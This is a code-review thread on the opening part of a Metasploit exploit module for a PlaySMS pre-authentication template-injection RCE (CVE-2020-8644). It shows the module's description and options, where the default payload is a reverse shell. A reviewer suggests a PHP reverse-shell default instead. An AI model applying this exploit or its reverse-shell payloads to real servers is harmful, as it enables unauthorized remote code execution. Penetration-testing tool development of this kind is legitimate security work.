modules/exploits/linux/http/playsms_pre_auth_rce.rb

```diff
@@ -0,0 +1,159 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'PlaySMS Before 1.4.3 Pre Auth Template Injection Remote Code Execution',
+        'Description' => %q{
+          This module exploits a Preauth Server-Side Template Injection leads remote code execution vulnerability in PlaySMS Before Version 1.4.3.
+          This issue is caused by Double processes a server-side template by Custom PHP Template system called 'TPL'.
+          which is used in PlaySMS template engine location src/Playsms/Tpl.php:_compile(). When Attacker supply username with malicious payload
+          and submit. This malicious payload first process by TPL and save value in current template after this value goes for the second process
+          which result code execution.
+          The TPL(https://github.com/antonraharja/tpl) template language is vulnerable to PHP code injection.
+
+          This module was tested against PlaySMS 1.4 on HackTheBox's Forlic Machine.
+        },
+        'Author' =>
+            [
+              'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Metasploit Module
+              'Lucas Rosevear' # Found and Initial PoC by NCC Groupd
+            ],
+        'License' => MSF_LICENSE,
+        'References' =>
+            [
+              ['CVE', '2020-8644'],
+              ['URL', 'https://www.youtube.com/watch?v=zu-bwoAtTrc'],
+              ['URL', 'https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/']
+            ],
+        'DefaultOptions' =>
+            {
+              'SSL' => false,
+              'PAYLOAD' => 'cmd/unix/reverse_python'
```

Comment:
Hey; I'm still new to metasploit, but am I right in saying that not all machines will have python installed?
If so, would choosing a PHP payload as the default be a good solution here?

```suggestion
              'PAYLOAD' => 'cmd/unix/reverse_php_ssl'
```